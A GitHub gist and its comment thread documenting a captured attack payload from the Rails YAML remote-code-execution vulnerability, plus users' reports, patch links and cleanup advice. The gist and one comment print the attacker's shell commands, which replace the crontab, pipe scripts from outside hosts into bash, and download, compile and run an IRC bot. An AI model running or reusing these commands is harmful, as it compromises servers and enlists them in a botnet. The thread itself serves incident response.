-
-
Save ismasan/5647955 to your computer and use it in GitHub Desktop.
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k |
The Gem::Requirements piece makes me think its the Rails YAML parameter vulnerability from a few months ago. Even if you've updated versions, you may still be vulnerable. You can check here to see if that's the bug: https://www.tinfoilsecurity.com/railscheck
If your server has been compromised, you must rebuild from scratch - updating versions isn't enough.
It looks like it's part of a botnet, as it's using IRC.
@bu2, my server was hit (but not successfully exploited) yesterday by one of the listed IPs; 95.138.186.181. Rollbar.io seems to have caught it and logged it 6 times. The exact error is Hash::DisallowedType: Disallowed type attribute: "yaml"
.
You can test for vulnerable versions in applications automatically with GemCanary which can be especially helpful if you have a large number of applications and lose track of some of them from time to time. I've found it presents the various alerts in a context that's relevant to you based on your Gemfile.lock
.
Wow. I think this needs some clarification. I was not who posted it to HN. This is a rather old Rails vulnerability that has since been patched and explained. It was all over the internet back in January. I updated my apps as soon as the patches were made available and none of my servers were ever successfully attacked in this way. I just spotted the backtraces in my error logs and posted the offending code here for reference.
All the comments and discussion are appreciated but I will suggest that if you were affected by this and plan to start a discussion then use your own fork and attribution. Thanks!
Hi,
an what about my configuration ??
Server version: Apache/2.2.14 (Ubuntu)
Rails 3.2.3
ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]
no nginx, no rails 3.2.1, no redmine, no yalm problem, but I had the same problem detailed below :
- k.c, k and ka files in /var/tmp (probably irc script)
- an new line in my crontab executing some wget like this :
wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka
wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O -
wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k
I do not find any suspect trace in my apache log, but there were some actions under fail2ban ( I didn't look deep at it anymore since chmod and update www-data cron resolve my problem as describe above).
I'm still searching how the malicious scripts were upload to my server ...
Hi,
my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough?
my server was infected too, should I do a reinstall?
definetly
@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.
Ok, anyway we known now where the problem comes from.
Sounds like this one
http://www.h-online.com/open/news/item/Attack-wave-on-Ruby-on-Rails-1872588.html
please update your rails-installation:
http://charlie.bz/blog/rails-3.2.10-remote-code-execution